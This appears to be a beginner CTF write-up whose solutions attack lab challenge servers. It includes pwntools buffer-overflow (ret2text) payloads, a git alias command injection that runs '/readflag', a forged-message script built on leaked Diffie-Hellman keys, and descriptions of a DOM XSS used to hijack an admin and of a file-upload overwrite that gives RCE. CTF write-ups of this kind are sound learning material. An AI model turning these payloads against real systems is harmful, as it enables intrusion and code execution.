Beginner CTF writeup: I'll only write up the interesting challenges.

# web

# babyjvav

https://www.tritium.work/2023/11/06/JAVA 入门的坑 /

# secchat


There is a DOM XSS here where input is inserted via innerHTML; it can be triggered with an svg tag or an img onerror handler.

Note that when a chat is started, the id is passed through this message function, so build the XSS into the id and send it to the admin; you can then control the admin's behaviour through the various function calls.

# 大雪想考五百分 (Daxue wants to score 500 points)

...I think this challenge is pretty dumb.

```javascript
// Proxy that answers each property read with whatever the checker wants to see
const daxue = new Proxy({
    "math": "150",
    "computer": new String("150"),
    "politics": 98,
    "english": 100,
    "flag": 0,
    value: 500
}, {
    get: function (target, prop, receiver) {
        if (prop === 'politics') {
            // returns 98, 99, ... on successive reads until it reaches 100
            if (target.politics !== 100) {
                return target.politics++;
            } else {
                return target.politics;
            }
        }
        if (prop === "valueOf") {
            // makes `daxue == 500` true through the ToPrimitive coercion hook
            return function () {
                return target.value;
            };
        }
        if (prop === 'english') {
            // first read gives 100, every later read gives "99"
            if (target.english !== 100) {
                return "99";
            } else {
                return target.english++;
            }
        }
        return Reflect.get(target, prop, receiver);
    }
});
```

# 我新学的 flask (The flask I just learned)

Use the arbitrary file upload to overwrite /src/app.py and add a malicious route, and you get RCE.


# misc

# 大雪树锯结构 (Daxue's data structure)

A gitshell challenge; it tests a rarely used feature.

```shell
git -c alias.test='!/readflag' test
```

Using an alias to bring in an external command: an alias whose value starts with `!` is run as a shell command, and `-c` injects it on the command line without touching any config file.

# 内存取证 (Memory forensics)

Use vol to list the processes, dump backdoor.exe, and read it.

# 3G 之前是什么 (What came before 3G)

It wants to test information theory, but in a CTF setting there is always a shortcut.

```python
from pwn import *

# Reconnect until the chest layout happens to be all ones, then answer 1 everywhere
while True:
    r = remote("172.20.14.117", 53001)
    for i in range(15):
        print(r.recvuntil(b"Ask Shannon:\n[-] "))
        r.sendline(b"1")
    r.recvuntil(b"Now open the chests:\n[-] ")
    r.sendline(b'1 1 1 1 1 1 1')
    res = r.recvline().decode()
    if "You've found all the treas" in res:
        print(res)
        break
    else:
        print("next")
        r.close()
        continue
```

There are only 128 possible cases (2^7 for the seven chests), so the all-ones layout comes up quickly.

# crypto

# hard_pow

Length extension attack. I couldn't get hashpumpy to install, so I used a substitute:

https://github.com/shellfeel/hash-ext-attack/tree/master

# easy_pow

Just brute-force it with bruteHASH; no script needed.

https://github.com/playGitboy/bruteHASH

# easy_dhke

Everything is leaked, so just grab it all and stitch it into a pwntools script.

```python
from Crypto.Util.number import *  # type: ignore
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from pwn import *

# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
p = 327824197795087630552811243153730025469
# g is the base used for generating public keys in the Diffie-Hellman key exchange
g = 5
# alice is Alice's private key, an integer chosen by Alice (leaked by the challenge)
alice = 22751
# bob is Bob's private key, an integer chosen by Bob (leaked by the challenge)
bob = 39494
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
Bob = pow(g, bob, p)
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
key = long_to_bytes(pow(Bob, alice, p))

def encrypt(plain_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
    return cipher_text

def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
    return plain_text

r = remote('172.20.14.117', 40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]  # strip the trailing newline
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa', key))
print(r.recvall())
```

# easy_rsa

The n in this challenge is really easy; factor it on factordb and decrypt.

# leak_d

You already know d, so just decrypt directly.

I seem to have deleted the script.

# pwn

Worked this one out myself; it's the simplest ret2text from ctfwiki.

```python
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
r = remote("172.20.14.117", 28202)
addr = 0x40115A  # address of the instruction that calls system
payload = flat([b'a' * 0x28, addr])  # 0x28 bytes of padding, then overwrite the return address
r.recvuntil(b'so please tell me what you want to tell me\n')
# print(payload)
r.sendline(payload)
# r.sendline(b'ls')
r.interactive()
# print(r.recvline())
```

addr is the address of the line that calls system; 0x28 bytes of padding (rbp-20h plus 8 for the saved rbp) overwrite up to the return address at the top of the stack.

# onepiece

```python
from pwn import *

io = remote("172.20.14.117", 61768)
addr = 0x40119e
# long padding followed by the target address repeated, so the return slot lands on it wherever it is
payload = b"a" * 0x100 + p64(addr) * 0x100
io.sendline(payload)
io.interactive()
```

Thrown together at random; I can't make sense of blindpwn.